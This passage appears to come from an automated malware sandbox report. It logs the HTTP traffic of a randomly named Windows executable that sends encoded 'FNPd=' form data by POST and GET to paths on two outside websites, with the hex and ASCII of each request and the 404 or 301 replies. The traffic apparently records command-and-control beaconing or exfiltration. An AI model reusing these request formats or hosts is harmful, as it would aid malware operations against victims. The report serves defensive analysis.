                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 39 54 6a 68 48 62 7a 6b 64 34 67 4c 31 48 4b 70 74 54 65 45 44 77 42 5a 37 70 6a 30 79 56 49 71 5a 6e 4e 2b 37 51 54 62 6f 68 49 61 62 68 59 30 73 46 38 41 79 68 36 58 2b 42 59 5a 73 78 55 54 45 67 4d 6f 50 47 2b 32 34 4d 39 45 36 54 54 50 42 4f 50 34 72 46 6e 2f 30 4b 6f 7a 57 55 35 47 33 73 71 61 2f 47 4f 44 37 30 55 48 61 4a 59 77 32 4d 64 4c 55 69 78 76 73 46 5a 50 49 42 61 69 6e 57 2f 6a 5a 72 76 63 4c 33 72 42 45 71 35 76 6b 7a 4c 4c 2b 64 4f 6a 57 34 2f 66 67 4d 74 34 30 68 44 46 54 4f 53 62 76 66 6e 45 64 51 41 67 6c 5a 47 6d 56 6a 59 44 66 4d 56 70 4d 54 36 79 5a 49 34 72 50 74 51 32 70 72 2b 56
                                  Data Ascii: FNPd=9TjhHbzkd4gL1HKptTeEDwBZ7pj0yVIqZnN+7QTbohIabhY0sF8Ayh6X+BYZsxUTEgMoPG+24M9E6TTPBOP4rFn/0KozWU5G3sqa/GOD70UHaJYw2MdLUixvsFZPIBainW/jZrvcL3rBEq5vkzLL+dOjW4/fgMt40hDFTOSbvfnEdQAglZGmVjYDfMVpMT6yZI4rPtQ2pr+V
                                  May 23, 2024 15:21:59.138900042 CEST479INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:00 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.64975692.118.24.161803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:01.008996964 CEST790OUTPOST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 39 54 6a 68 48 62 7a 6b 64 34 67 4c 7a 6e 36 70 67 53 65 45 43 51 42 65 2b 70 6a 30 72 46 49 55 5a 6e 42 2b 37 55 72 78 6f 54 73 61 62 42 6f 30 6a 6b 38 41 31 68 36 58 78 68 59 63 68 52 55 59 45 67 77 61 50 44 47 32 34 4d 35 45 36 52 62 50 42 39 33 2f 71 56 6e 39 38 71 6f 74 62 30 35 47 33 73 71 61 2f 43 6e 75 37 30 4d 48 62 36 41 77 30 74 64 49 4b 79 78 6f 38 31 5a 50 46 68 61 6d 6e 57 2f 4e 5a 71 79 78 4c 30 54 42 45 72 4a 76 6b 43 4c 4d 31 64 50 4a 59 59 2b 48 72 4a 41 4b 32 53 2b 54 4d 39 32 32 79 6f 7a 45 52 47 42 36 35 71 47 46 48 7a 34 42 66 4f 4e 62 4d 7a 36 59 62 49 41 72 64 36 63 52 6d 66 62 32 64 47 41 6c 5a 33 50 48 49 58 63 6f 68 6a 30 4f 6f 4a 39 2f 57 67 3d 3d
                                  Data Ascii: FNPd=9TjhHbzkd4gLzn6pgSeECQBe+pj0rFIUZnB+7UrxoTsabBo0jk8A1h6XxhYchRUYEgwaPDG24M5E6RbPB93/qVn98qotb05G3sqa/Cnu70MHb6Aw0tdIKyxo81ZPFhamnW/NZqyxL0TBErJvkCLM1dPJYY+HrJAK2S+TM922yozERGB65qGFHz4BfONbMz6YbIArd6cRmfb2dGAlZ3PHIXcohj0OoJ9/Wg==
                                  May 23, 2024 15:22:01.681588888 CEST479INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:03 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.64975792.118.24.161803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:03.539709091 CEST1803OUTPOST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 39 54 6a 68 48 62 7a 6b 64 34 67 4c 7a 6e 36 70 67 53 65 45 43 51 42 65 2b 70 6a 30 72 46 49 55 5a 6e 42 2b 37 55 72 78 6f 54 6b 61 59 79 67 30 69 48 45 41 30 68 36 58 34 42 59 64 68 52 55 4a 45 6b 6b 65 50 44 43 49 34 4f 78 45 6f 43 44 50 51 38 33 2f 68 56 6e 39 6a 61 6f 77 57 55 34 65 33 73 36 65 2f 47 44 75 37 30 4d 48 62 34 30 77 39 63 64 49 49 79 78 76 73 46 5a 4c 49 42 62 7a 6e 57 33 37 5a 71 33 4d 4c 6c 7a 42 45 4c 5a 76 6d 51 6a 4d 70 4e 50 4c 62 59 2b 55 72 4a 45 52 32 53 69 58 4d 38 53 63 79 76 62 45 53 43 38 63 39 71 36 47 52 69 6b 45 43 75 31 44 48 45 69 64 62 37 49 73 59 4a 6b 36 6b 39 58 48 51 69 64 7a 52 30 43 41 41 78 51 71 2f 6b 5a 42 6c 37 70 76 49 56 42 33 6f 63 45 52 4e 52 6d 73 33 33 4a 6f 6e 74 53 54 46 4d 37 35 4f 77 74 45 43 71 73 4f 54 79 46 48 58 51 55 37 70 74 6d 58 6a 73 73 4a 53 4f 4b 32 2b 6b 65 31 6d 6a 71 6f 6f 42 65 79 38 58 6e 67 61 38 6c 49 78 2b 5a 48 53 68 34 37 62 79 72 65 44 4a 76 37 7a 51 71 54 59 49 71 56 41 4b 37 50 34 76 38 52 59 53 47 4a 66 [TRUNCATED]
                                  Data Ascii: FNPd=9TjhHbzkd4gLzn6pgSeECQBe+pj0rFIUZnB+7UrxoTkaYyg0iHEA0h6X4BYdhRUJEkkePDCI4OxEoCDPQ83/hVn9jaowWU4e3s6e/GDu70MHb40w9cdIIyxvsFZLIBbznW37Zq3MLlzBELZvmQjMpNPLbY+UrJER2SiXM8ScyvbESC8c9q6GRikECu1DHEidb7IsYJk6k9XHQidzR0CAAxQq/kZBl7pvIVB3ocERNRms33JontSTFM75OwtECqsOTyFHXQU7ptmXjssJSOK2+ke1mjqooBey8Xnga8lIx+ZHSh47byreDJv7zQqTYIqVAK7P4v8RYSGJfwGMhQsv3Gbq2+Vgp8xItY813n/2+ROtpSA2PAf5k0a9lhQSmAoBZJoReJHuBun91rNxUWFXpSCYFD4fAESYpl7B8wF1HItrra91ygxif1i67ivPZUbDWCMVJZDxYscK6V5MHkVyJgkpJCh6/DNP8KvH8Djjg2AoVLpZ+AQMX3wdgI80+MvSna5YUnsltfwBmvdiMFR3eBUQ/yz4Zrzc57YsAYQxt/OwrJINT+mIcWT3xEEZkWBvpr4U9wjNtvhbtPegq1iCUqlNEQ/PH4eu4Z3Cm7m+gu5U4Lakt2t+3QRF9URP7ofaPjLdW6jXZl0ED/sibB1l4+jpabpKY2uJ+y9FOFbSBhPPZ/Q1MFZXh3s3IpdKpAoictn0VLuGEk8Gsv2ROQoO1nRQElcCxn76a6nel79XMjkzbfrCQR8eZrnMxX5Xz3Rp8mBqFanceJ/z4Q3YbjuaUTh/VzNd2UcqkecW1tSOiIi4yqneYpxyAvC4cGl7oVtG8AlImSaiFfdXv9GxW+llbdogQrR415PQpgEzAsdeaOikFtTvHEl6r9gu2sGFv4uXrOUF0Rax5CoSwCR6cJPa4zQ1tOAIVeOWiTG/l5D+jvipd04vONMhulCnTuI74hFd5eNS8+Nyte9MdIcKCBRJzR0EVw7D7n6lhE/qJS+ulJV5/Oi [TRUNCATED]
                                  May 23, 2024 15:22:04.313246965 CEST479INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:06 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.64975892.118.24.161803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:06.071713924 CEST499OUTGET /xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:06.743333101 CEST479INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:08 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.649759212.227.172.253803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:11.829591036 CEST751OUTPOST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 76 37 43 44 30 38 33 76 75 50 32 71 4c 47 54 55 2b 46 59 64 6c 38 57 2b 58 35 32 31 77 4d 35 78 64 64 34 64 76 32 69 79 4a 4e 4d 77 34 74 33 76 55 6b 51 73 6d 7a 45 32 4d 58 48 56 50 32 6e 33 66 59 7a 4e 7a 78 6c 2b 66 6d 43 49 75 70 51 36 72 4e 75 75 69 4d 56 45 2f 69 70 32 6a 55 70 41 38 33 72 70 72 7a 32 41 50 42 43 5a 6d 4a 77 75 6c 5a 76 48 2f 6a 73 45 6c 50 48 6c 34 65 79 63 74 56 64 6b 62 43 67 43 74 59 39 78 68 73 49 31 2f 59 32 66 64 36 4d 5a 4d 4f 32 46 35 4c 33 36 41 4d 41 52 38 4e 51 72 37 46 46 73 6b 33 7a 38 74 59 35 47 75 48 39 59 72 42 45 36 76 63 31 2f 45 43 32 47 6c 62 39 6c 41 75 6e 6c
                                  Data Ascii: FNPd=v7CD083vuP2qLGTU+FYdl8W+X521wM5xdd4dv2iyJNMw4t3vUkQsmzE2MXHVP2n3fYzNzxl+fmCIupQ6rNuuiMVE/ip2jUpA83rprz2APBCZmJwulZvH/jsElPHl4eyctVdkbCgCtY9xhsI1/Y2fd6MZMO2F5L36AMAR8NQr7FFsk3z8tY5GuH9YrBE6vc1/EC2Glb9lAunl
                                  May 23, 2024 15:22:12.477113962 CEST427INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:12 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:12 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.649760212.227.172.253803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:14.369345903 CEST775OUTPOST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 76 37 43 44 30 38 33 76 75 50 32 71 4b 6d 50 55 35 69 4d 64 30 4d 57 39 59 5a 32 31 36 73 35 39 64 64 30 64 76 33 6d 59 63 75 6f 77 35 49 4c 76 56 6d 6f 73 6c 7a 45 32 56 6e 48 71 4c 32 6d 35 66 59 33 46 7a 77 5a 2b 66 6d 57 49 75 70 67 36 71 2b 47 68 68 38 56 43 31 79 70 77 6e 55 70 41 38 33 72 70 72 77 4b 75 50 42 61 5a 6d 34 41 75 6b 37 48 41 79 44 73 44 69 50 48 6c 38 65 7a 62 74 56 64 53 62 43 51 6b 74 65 35 78 68 6f 4d 31 2f 4e 43 59 58 36 4d 66 47 75 33 50 77 61 47 70 49 74 5a 69 69 37 59 33 6b 58 5a 4b 6f 68 79 6d 78 72 35 6c 38 58 64 61 72 44 63 49 76 38 31 56 47 43 4f 47 33 4d 78 43 50 61 43 47 4f 4c 65 58 41 43 59 41 54 43 76 71 75 47 51 41 50 71 64 67 4e 77 3d 3d
                                  Data Ascii: FNPd=v7CD083vuP2qKmPU5iMd0MW9YZ216s59dd0dv3mYcuow5ILvVmoslzE2VnHqL2m5fY3FzwZ+fmWIupg6q+Ghh8VC1ypwnUpA83rprwKuPBaZm4Auk7HAyDsDiPHl8ezbtVdSbCQkte5xhoM1/NCYX6MfGu3PwaGpItZii7Y3kXZKohymxr5l8XdarDcIv81VGCOG3MxCPaCGOLeXACYATCvquGQAPqdgNw==
                                  May 23, 2024 15:22:15.010584116 CEST427INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:14 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:14 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.649761212.227.172.253803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:16.900433064 CEST1788OUTPOST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 76 37 43 44 30 38 33 76 75 50 32 71 4b 6d 50 55 35 69 4d 64 30 4d 57 39 59 5a 32 31 36 73 35 39 64 64 30 64 76 33 6d 59 63 75 67 77 34 36 7a 76 56 48 6f 73 72 54 45 32 64 48 48 52 4c 32 6e 6c 66 5a 54 42 7a 77 56 49 66 6b 75 49 73 4b 6f 36 69 76 47 68 32 4d 56 43 39 53 70 31 6a 55 70 76 38 7a 48 6c 72 7a 79 75 50 42 61 5a 6d 37 59 75 79 5a 76 41 30 44 73 45 6c 50 48 68 34 65 79 38 74 52 34 6e 62 44 6b 53 71 75 5a 78 68 4d 6f 31 39 37 75 59 52 71 4d 64 46 75 32 61 77 61 4c 78 49 74 30 52 69 37 45 52 6b 58 74 4b 71 6b 2f 36 6c 4a 78 6f 71 32 64 49 2f 55 34 68 70 73 46 70 65 79 79 47 37 50 4e 69 49 4b 43 62 43 74 69 50 42 51 42 32 65 42 72 58 68 78 46 78 61 59 4d 73 65 31 6f 65 52 70 77 30 30 6a 6d 45 2f 4a 4f 35 5a 75 77 46 65 42 61 58 4e 4b 68 58 35 71 48 72 75 67 44 4d 66 5a 41 6c 54 6c 44 56 4e 72 43 6d 53 74 55 36 35 5a 6f 33 64 44 62 48 38 72 58 4c 64 43 4a 41 67 51 4a 71 70 51 36 69 2b 5a 6e 6f 68 6a 6e 54 57 52 63 45 74 55 55 4f 61 57 41 67 48 4c 66 37 65 4d 49 47 45 5a 53 2f 67 [TRUNCATED]
                                  Data Ascii: FNPd=v7CD083vuP2qKmPU5iMd0MW9YZ216s59dd0dv3mYcugw46zvVHosrTE2dHHRL2nlfZTBzwVIfkuIsKo6ivGh2MVC9Sp1jUpv8zHlrzyuPBaZm7YuyZvA0DsElPHh4ey8tR4nbDkSquZxhMo197uYRqMdFu2awaLxIt0Ri7ERkXtKqk/6lJxoq2dI/U4hpsFpeyyG7PNiIKCbCtiPBQB2eBrXhxFxaYMse1oeRpw00jmE/JO5ZuwFeBaXNKhX5qHrugDMfZAlTlDVNrCmStU65Zo3dDbH8rXLdCJAgQJqpQ6i+ZnohjnTWRcEtUUOaWAgHLf7eMIGEZS/gkS3u+3JRINVmmFlV8wF+b2YXsxSFsu6jefXB+jHX0vC/MfBvBusskikt2l3o/LDbeH0NHCocu7ixy3QRQQEhUvKx7h8V9Cq6jLeol5Qm3wcu4eI0qRQkBP4LfvRyPGZIm28JeTZx8mgJ4le6XVg2Z/GHzt1FtPrmsl1dSjPks3G/x5sDb0yahdqVVF2CVDxqBKIgIPgQ357+VrNDrIVLioTYTSAIV1zYdbCPXuVJdkNZzN0Z5w7KZTUGnBjoFdLj40P6p3icflxAhGhDoE/y26o43g+BG9zbW601vnxqLSS/wgcsKiPhtN0DUoMpN+Uvciqe2u/C3VQjLvCmSWoirfVKbyMK+MdkWEH9zWltKqzLJS/g9nN7uH9BVSAEawpnDoqOybJWIGS1xsMK1+szQQcagtpoCyKw6q+TGFW8Ov0qiSKo/+GehMoFZhGzdYfpzcJKzl5YqZkLSqpDPH3rnSGWl7eiClxpqoYz8JHEyPEH8wLp2SV4lSJgJCIhGwIpLopRmr43qiBRZXK7i55JSf2+kK7ii3BLhoWR1KUkOBTW9O8BcrPO1OCeiTuMvy1XUk8DC5ZLspvMkm/UBCwbDEUxoWO2lP1sV/e2Dcq3XQzdvEuSNrGviMFbd/yyY37o2JGAjdEs6L4iX5Ixs5g9KzWrW